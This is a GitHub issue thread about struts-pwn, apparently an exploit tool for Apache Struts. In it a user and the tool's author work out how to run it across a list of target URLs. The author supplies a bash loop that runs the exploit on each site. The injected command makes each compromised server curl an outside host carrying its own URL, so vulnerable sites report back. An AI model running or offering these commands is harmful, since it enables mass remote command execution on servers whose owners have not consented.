### ISSUE TITLE
passing url to the command var

### ISSUE THREAD

**Issue by random-robbie** [mazen160/struts-pwn#6]
Hey dude,

When doing a list any way to provide the url as a var in the command so you can log against which sites are vun?

```
python struts-pwn.py --list 'urls.txt' -c 'curl -L https://mysite.com/test.php?url='
```

**Comment by mazen160** [comment]
Hi @random-robbie,

it's not possible using the current code, but you can do the following:

```bash
for url in `cat urls.txt`; do
  python struts-pwn.py --url "$url" -c "curl -L https://mysite.com/test.php?url=$url"
done
```
This should achieve the goal :)

**Comment by random-robbie** [comment]
Your a legend!

**Comment by mazen160** [comment]
Totally glad to help! :)
